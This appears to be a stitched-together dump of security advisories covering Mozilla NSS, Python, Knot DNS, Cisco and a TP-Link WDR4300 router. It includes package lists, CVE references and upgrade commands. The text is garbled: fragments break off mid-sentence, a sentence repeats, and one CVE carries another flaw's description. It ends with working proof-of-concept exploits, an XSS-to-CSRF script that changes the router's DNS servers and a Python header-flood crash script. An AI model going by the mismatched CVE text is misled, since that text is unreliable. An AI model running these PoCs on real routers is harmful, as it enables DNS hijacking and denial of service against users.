a prerequisite to nss-3.17.x.
Additionally the rootcerts package has also been updated to the
latest version as of 2014-11-17, which adds, removes, and distrusts
several certificates.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1492
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1544
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1545
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.1_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.2_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.3_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.1_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.2_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.3_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.4_release_notes
https://www.mozilla.org/en-US/security/advisories/mfsa2014-55/
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
2aea53da7622f23ec03faa5605d9672c mbs2/x86_64/lemon-3.8.6-1.mbs2.x86_64.rpm
68cc94d4a95146583d8a6b2849759614 mbs2/x86_64/lib64nspr4-4.10.8-1.mbs2.x86_64.rpm
a6ffe2ebe6de847b6227c8c4c2cb4ba4 mbs2/x86_64/lib64nspr-devel-4.10.8-1.mbs2.x86_64.rpm
78ba63e6a21b897abac8e4b0e975470d mbs2/x86_64/lib64nss3-3.17.4-1.mbs2.x86_64.rpm
aacf8b1f144a7044e77abc5d0be72a7b mbs2/x86_64/lib64nss-devel-3.17.4-1.mbs2.x86_64.rpm
6afff220f7fa93dede0486b76155ae44 mbs2/x86_64/lib64nss-static-devel-3.17.4-1.mbs2.x86_64.rpm
63ffb7675dc414a52a4647f5ed302e3c mbs2/x86_64/lib64sqlite3_0-3.8.6-1.mbs2.x86_64.rpm
cfefad1ef4f83cceeeb34a4f2ffca442 mbs2/x86_64/lib64sqlite3-devel-3.8.6-1.mbs2.x86_64.rpm
e976251ee0ae5c2b2a2f6a163b693e85 mbs2/x86_64/lib64sqlite3-static-devel-3.8.6-1.mbs2.x86_64.rpm
42018611a17d2b6480b63f0a968a796d mbs2/x86_64/nss-3.17.4-1.mbs2.x86_64.rpm
b955454c30e482635944134eb02456e4 mbs2/x86_64/nss-doc-3.17.4-1.mbs2.noarch.rpm
3058267964146b7806c493ff536da63d mbs2/x86_64/rootcerts-20141117.00-1.mbs2.x86_64.rpm
18fc28f1ae18ddd5fe01acb77811d0e6 mbs2/x86_64/rootcerts-java-20141117.00-1.mbs2.x86_64.rpm
200f6a413d13d850ea084a9e42c4fc23 mbs2/x86_64/sqlite3-tcl-3.8.6-1.mbs2.x86_64.rpm
8c88a446098d21cf2675173e32a208e6 mbs2/x86_64/sqlite3-tools-3.8.6-1.mbs2.x86_64.rpm
2e494a940c3189617ff62bc15a2b14fb mbs2/SRPMS/nspr-4.10.8-1.mbs2.src.rpm
0a28d1c9c07909d488c7dabe92c47529 mbs2/SRPMS/nss-3.17.4-1.mbs2.src.rpm
10dcc357bb0bbdc22e7dd308074d037b mbs2/SRPMS/rootcerts-20141117.00-1.mbs2.src.rpm
df412cc892bb40e1d7345079a25c0bbb mbs2/SRPMS/sqlite3-3.8.6-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
.
For the stable distribution (wheezy), this problem has been fixed in
version 24.8.1esr-1~deb7u1.
For the testing distribution (jessie) and unstable distribution (sid),
Iceweasel uses the system NSS library, handled in DSA 3033-1.
We recommend that you upgrade your iceweasel packages.
| VAR-201803-0062 | CVE-2014-0486 | Knot DNS Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Knot DNS before 1.5.2 allows remote attackers to cause a denial of service (application crash) via a crafted DNS message. Knot DNS contains an input validation vulnerability that may result in interruption of service (DoS). Knot DNS is a DNS server. Knot DNS is prone to an unspecified denial-of-service vulnerability.
Remote attackers can exploit this issue to cause denial-of-service conditions for legitimate users.
| VAR-201410-1319 | CVE-2014-7185 | Integer overflow vulnerability in bufferobject.c in Python |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a "buffer" function. Python is prone to an integer-overflow vulnerability because it fails to properly bounds check user-supplied input before copying it into an insufficiently sized buffer.
Attackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition.
Versions prior to Python 2.7.8 are vulnerable. The language is scalable, supports modules and packages, and supports multiple platforms.
Affected packages
=================
-------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------
  1  dev-lang/python           < 3.3.5-r1               *>= 2.7.9-r1
                                                         >= 3.3.5-r1
Description
===========
Multiple vulnerabilities have been discovered in Python. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Python 3.3 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-3.3.5-r1"
All Python 2.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.7.9-r1"
References
==========
[ 1 ] CVE-2013-1752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1752
[ 2 ] CVE-2013-7338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-7338
[ 3 ] CVE-2014-1912
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1912
[ 4 ] CVE-2014-2667
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2667
[ 5 ] CVE-2014-4616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4616
[ 6 ] CVE-2014-7185
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7185
[ 7 ] CVE-2014-9365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9365
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-10
============================================================================
Ubuntu Security Notice USN-2653-1
June 25, 2015
python2.7, python3.2, python3.4 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in Python. A malicious ftp, http,
imap, nntp, pop or smtp server could use this issue to cause a denial of
service. This issue only affected Ubuntu
12.04 LTS and Ubuntu 14.04 LTS. This
issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected
Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
python2.7 2.7.8-10ubuntu1.1
python2.7-minimal 2.7.8-10ubuntu1.1
python3.4 3.4.2-1ubuntu0.1
python3.4-minimal 3.4.2-1ubuntu0.1
Ubuntu 14.04 LTS:
python2.7 2.7.6-8ubuntu0.2
python2.7-minimal 2.7.6-8ubuntu0.2
python3.4 3.4.0-2ubuntu1.1
python3.4-minimal 3.4.0-2ubuntu1.1
Ubuntu 12.04 LTS:
python2.7 2.7.3-0ubuntu3.8
python2.7-minimal 2.7.3-0ubuntu3.8
python3.2 3.2.3-0ubuntu3.7
python3.2-minimal 3.2.3-0ubuntu3.7
In general, a standard system update will make all the necessary changes.
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: python27 security, bug fix, and enhancement update
Advisory ID: RHSA-2015:1064-01
Product: Red Hat Software Collections
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1064.html
Issue date: 2015-06-04
CVE Names: CVE-2013-1752 CVE-2013-1753 CVE-2014-1912
CVE-2014-4616 CVE-2014-4650 CVE-2014-7185
=====================================================================
1. Summary:
Updated python27 collection packages that fix multiple security issues and
several bugs are now available as part of Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
3. Description:
Python is an interpreted, interactive, object-oriented programming language
that supports modules, classes, exceptions, high-level dynamic data types,
and dynamic typing. The python27 collection provides a stable release of
Python 2.7 with a number of additional utilities and database connectors
for MySQL and PostgreSQL.
The python27-python packages have been upgraded to upstream version 2.7.8,
which provides numerous bug fixes over the previous version. (BZ#1167912)
The following security issues were fixed in the python27-python component:
It was discovered that the socket.recvfrom_into() function failed to check
the size of the supplied buffer. This could lead to a buffer overflow when
the function was called with an insufficiently sized buffer.
(CVE-2014-1912)
It was discovered that the Python xmlrpclib module did not restrict the
size of gzip-compressed HTTP responses. A malicious XMLRPC server could
cause an XMLRPC client using xmlrpclib to consume an excessive amount of
memory. (CVE-2013-1753)
It was discovered that multiple Python standard library modules
implementing network protocols (such as httplib or smtplib) failed to
restrict the sizes of server responses. A malicious server could cause a
client using one of the affected modules to consume an excessive amount of
memory. (CVE-2013-1752)
It was discovered that the CGIHTTPServer module incorrectly handled URL
encoded paths. A remote attacker could use this flaw to execute scripts
outside of the cgi-bin directory, or disclose the source code of the
scripts in the cgi-bin directory. An attacker able to control these arguments
could use this flaw to disclose portions of the application memory or cause
it to crash. (CVE-2014-7185)
The following security issue was fixed in the python27-python and
python27-python-simplejson components:
A flaw was found in the way the json module handled negative index
arguments passed to certain functions (such as raw_decode()). An attacker
able to control the index value passed to one of the affected functions
could possibly use this flaw to disclose portions of the application
memory. (CVE-2014-4616)
In addition, this update adds the following enhancement:
* The python27 Software Collection now includes the python-wheel and
python-pip modules. (BZ#994189, BZ#1167902)
All python27 users are advised to upgrade to these updated packages, which
correct these issues and add these enhancements. All running python27
instances must be restarted for this update to take effect.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
994189 - Please create a python-pip build for the python 2.7 and 3.3 SCL environments on RHEL 6
1046170 - CVE-2013-1753 python: XMLRPC library unrestricted decompression of HTTP responses using gzip encoding
1046174 - CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
1062370 - CVE-2014-1912 python: buffer overflow in socket.recvfrom_into()
1112285 - CVE-2014-4616 python: missing boundary check in JSON module
1113527 - CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs
1146026 - CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read
1167912 - Update Python in python27 SCL to Python 2.7.8
1170993 - RPM macro rpm/macros.python2.python27 references non-existing /usr/lib/rpm/brp-scl-compress
6. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
python27-1.1-17.el6.src.rpm
python27-python-2.7.8-3.el6.src.rpm
python27-python-pip-1.5.6-5.el6.src.rpm
python27-python-setuptools-0.9.8-3.el6.src.rpm
python27-python-simplejson-3.2.0-2.el6.src.rpm
python27-python-wheel-0.24.0-2.el6.src.rpm
noarch:
python27-python-pip-1.5.6-5.el6.noarch.rpm
python27-python-setuptools-0.9.8-3.el6.noarch.rpm
python27-python-wheel-0.24.0-2.el6.noarch.rpm
x86_64:
python27-1.1-17.el6.x86_64.rpm
python27-python-2.7.8-3.el6.x86_64.rpm
python27-python-debug-2.7.8-3.el6.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm
python27-python-devel-2.7.8-3.el6.x86_64.rpm
python27-python-libs-2.7.8-3.el6.x86_64.rpm
python27-python-simplejson-3.2.0-2.el6.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm
python27-python-test-2.7.8-3.el6.x86_64.rpm
python27-python-tools-2.7.8-3.el6.x86_64.rpm
python27-runtime-1.1-17.el6.x86_64.rpm
python27-scldevel-1.1-17.el6.x86_64.rpm
python27-tkinter-2.7.8-3.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source:
python27-1.1-17.el6.src.rpm
python27-python-2.7.8-3.el6.src.rpm
python27-python-pip-1.5.6-5.el6.src.rpm
python27-python-setuptools-0.9.8-3.el6.src.rpm
python27-python-simplejson-3.2.0-2.el6.src.rpm
python27-python-wheel-0.24.0-2.el6.src.rpm
noarch:
python27-python-pip-1.5.6-5.el6.noarch.rpm
python27-python-setuptools-0.9.8-3.el6.noarch.rpm
python27-python-wheel-0.24.0-2.el6.noarch.rpm
x86_64:
python27-1.1-17.el6.x86_64.rpm
python27-python-2.7.8-3.el6.x86_64.rpm
python27-python-debug-2.7.8-3.el6.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm
python27-python-devel-2.7.8-3.el6.x86_64.rpm
python27-python-libs-2.7.8-3.el6.x86_64.rpm
python27-python-simplejson-3.2.0-2.el6.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm
python27-python-test-2.7.8-3.el6.x86_64.rpm
python27-python-tools-2.7.8-3.el6.x86_64.rpm
python27-runtime-1.1-17.el6.x86_64.rpm
python27-scldevel-1.1-17.el6.x86_64.rpm
python27-tkinter-2.7.8-3.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source:
python27-1.1-17.el6.src.rpm
python27-python-2.7.8-3.el6.src.rpm
python27-python-pip-1.5.6-5.el6.src.rpm
python27-python-setuptools-0.9.8-3.el6.src.rpm
python27-python-simplejson-3.2.0-2.el6.src.rpm
python27-python-wheel-0.24.0-2.el6.src.rpm
noarch:
python27-python-pip-1.5.6-5.el6.noarch.rpm
python27-python-setuptools-0.9.8-3.el6.noarch.rpm
python27-python-wheel-0.24.0-2.el6.noarch.rpm
x86_64:
python27-1.1-17.el6.x86_64.rpm
python27-python-2.7.8-3.el6.x86_64.rpm
python27-python-debug-2.7.8-3.el6.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm
python27-python-devel-2.7.8-3.el6.x86_64.rpm
python27-python-libs-2.7.8-3.el6.x86_64.rpm
python27-python-simplejson-3.2.0-2.el6.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm
python27-python-test-2.7.8-3.el6.x86_64.rpm
python27-python-tools-2.7.8-3.el6.x86_64.rpm
python27-runtime-1.1-17.el6.x86_64.rpm
python27-scldevel-1.1-17.el6.x86_64.rpm
python27-tkinter-2.7.8-3.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
python27-1.1-17.el6.src.rpm
python27-python-2.7.8-3.el6.src.rpm
python27-python-pip-1.5.6-5.el6.src.rpm
python27-python-setuptools-0.9.8-3.el6.src.rpm
python27-python-simplejson-3.2.0-2.el6.src.rpm
python27-python-wheel-0.24.0-2.el6.src.rpm
noarch:
python27-python-pip-1.5.6-5.el6.noarch.rpm
python27-python-setuptools-0.9.8-3.el6.noarch.rpm
python27-python-wheel-0.24.0-2.el6.noarch.rpm
x86_64:
python27-1.1-17.el6.x86_64.rpm
python27-python-2.7.8-3.el6.x86_64.rpm
python27-python-debug-2.7.8-3.el6.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm
python27-python-devel-2.7.8-3.el6.x86_64.rpm
python27-python-libs-2.7.8-3.el6.x86_64.rpm
python27-python-simplejson-3.2.0-2.el6.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm
python27-python-test-2.7.8-3.el6.x86_64.rpm
python27-python-tools-2.7.8-3.el6.x86_64.rpm
python27-runtime-1.1-17.el6.x86_64.rpm
python27-scldevel-1.1-17.el6.x86_64.rpm
python27-tkinter-2.7.8-3.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
python27-1.1-20.el7.src.rpm
python27-python-2.7.8-3.el7.src.rpm
python27-python-pip-1.5.6-5.el7.src.rpm
python27-python-setuptools-0.9.8-5.el7.src.rpm
python27-python-simplejson-3.2.0-3.el7.src.rpm
python27-python-wheel-0.24.0-2.el7.src.rpm
noarch:
python27-python-pip-1.5.6-5.el7.noarch.rpm
python27-python-setuptools-0.9.8-5.el7.noarch.rpm
python27-python-wheel-0.24.0-2.el7.noarch.rpm
x86_64:
python27-1.1-20.el7.x86_64.rpm
python27-python-2.7.8-3.el7.x86_64.rpm
python27-python-debug-2.7.8-3.el7.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el7.x86_64.rpm
python27-python-devel-2.7.8-3.el7.x86_64.rpm
python27-python-libs-2.7.8-3.el7.x86_64.rpm
python27-python-simplejson-3.2.0-3.el7.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-3.el7.x86_64.rpm
python27-python-test-2.7.8-3.el7.x86_64.rpm
python27-python-tools-2.7.8-3.el7.x86_64.rpm
python27-runtime-1.1-20.el7.x86_64.rpm
python27-scldevel-1.1-20.el7.x86_64.rpm
python27-tkinter-2.7.8-3.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source:
python27-1.1-20.el7.src.rpm
python27-python-2.7.8-3.el7.src.rpm
python27-python-pip-1.5.6-5.el7.src.rpm
python27-python-setuptools-0.9.8-5.el7.src.rpm
python27-python-simplejson-3.2.0-3.el7.src.rpm
python27-python-wheel-0.24.0-2.el7.src.rpm
noarch:
python27-python-pip-1.5.6-5.el7.noarch.rpm
python27-python-setuptools-0.9.8-5.el7.noarch.rpm
python27-python-wheel-0.24.0-2.el7.noarch.rpm
x86_64:
python27-1.1-20.el7.x86_64.rpm
python27-python-2.7.8-3.el7.x86_64.rpm
python27-python-debug-2.7.8-3.el7.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el7.x86_64.rpm
python27-python-devel-2.7.8-3.el7.x86_64.rpm
python27-python-libs-2.7.8-3.el7.x86_64.rpm
python27-python-simplejson-3.2.0-3.el7.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-3.el7.x86_64.rpm
python27-python-test-2.7.8-3.el7.x86_64.rpm
python27-python-tools-2.7.8-3.el7.x86_64.rpm
python27-runtime-1.1-20.el7.x86_64.rpm
python27-scldevel-1.1-20.el7.x86_64.rpm
python27-tkinter-2.7.8-3.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2013-1752
https://access.redhat.com/security/cve/CVE-2013-1753
https://access.redhat.com/security/cve/CVE-2014-1912
https://access.redhat.com/security/cve/CVE-2014-4616
https://access.redhat.com/security/cve/CVE-2014-4650
https://access.redhat.com/security/cve/CVE-2014-7185
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
. 6) - i386, x86_64
3.
Python supports interfaces to many system calls and libraries, as well as
to various windowing systems (X11, Motif, Tk, Mac and MFC). Space precludes documenting all of these changes in this
advisory. This could be used
to crash a Python application that uses the socket.recvfrom_into()
function or, possibly, execute arbitrary code with the permissions
of the user running vulnerable Python code (CVE-2014-1912).
This updates the python package to version 2.7.6, which fixes several
other bugs, including denial of service flaws due to unbound readline()
calls in the ftplib and nntplib modules (CVE-2013-1752).
Denial of service flaws due to unbound readline() calls in the imaplib,
poplib, and smtplib modules (CVE-2013-1752).
A gzip bomb and unbound read denial of service flaw in python XMLRPC
library (CVE-2013-1753).
Python is susceptible to arbitrary process memory reading by a user
or adversary due to a bug in the _json module caused by insufficient
bounds checking. The bug is caused by allowing the user to supply a
negative value that is used as an array index, causing the scanstring
function to access process memory outside of the string it is intended
to access (CVE-2014-4616).
The CGIHTTPServer Python module does not properly handle URL-encoded
path separators in URLs.
Python before 2.7.8 is vulnerable to an integer overflow in the buffer
type (CVE-2014-7185).
When Python's standard library HTTP clients (httplib, urllib,
urllib2, xmlrpclib) are used to access resources with HTTPS, by
default the certificate is not checked against any trust store,
nor is the hostname in the certificate checked against the requested
host. It was possible to configure a trust root to be checked against,
however there were no facilities for hostname checking (CVE-2014-9365).
The python-pip and tix packages were added due to missing build
dependencies. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
| VAR-201409-0403 | CVE-2014-3380 | Cisco Unified Communications Domain Manager Platform Software Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Unified Communications Domain Manager Platform Software 4.4(.3) and earlier allows remote attackers to cause a denial of service (CPU consumption) by sending crafted TCP packets quickly, aka Bug ID CSCuo42063.
A remote attacker may exploit this issue to trigger a denial-of-service condition due to excessive CPU utilization.
This issue is being tracked by Cisco Bug ID CSCuo42063. This component features scalable, distributed, and highly available enterprise Voice over IP call processing
| VAR-201409-0078 | CVE-2014-4728 | TP-LINK N750 Wireless Dual Band Gigabit Router firmware Web Service disruption at the server (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The web server in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to cause a denial of service (crash) via a long header in a GET request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has a denial-of-service vulnerability that an attacker can exploit to launch a denial-of-service attack. TP-LINK WDR4300 is prone to an HTML-injection vulnerability and a denial-of-service vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to cause denial-of-service conditions or execute attacker-supplied HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company.
Versions Affected: 130617 , possibly earlier
CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728
Vulnerabilities Description
===================
# Stored XSS -
It is possible to inject JavaScript code via the DHCP hostname field.
If the administrator visits the DHCP clients page (web panel),
the script will execute.
Proof of Concept:
============
http://elisyan.com/tplink/wdr4300.html
---- start wdr4300.html ----
/*
Author: Oz Elisyan
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)
*/
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
    xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
    xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
    if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
        document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
    }
}
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);
xmlhttp.send();
---- end wdr4300.html ----
http://elisyan.com/tplink/wdr4300.py
---- start wdr4300.py ----
#Author: Oz Elisyan
#TP-Link WDR4300 DoS PoC
import httplib
conn = httplib.HTTPConnection("192.168.0.1")
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
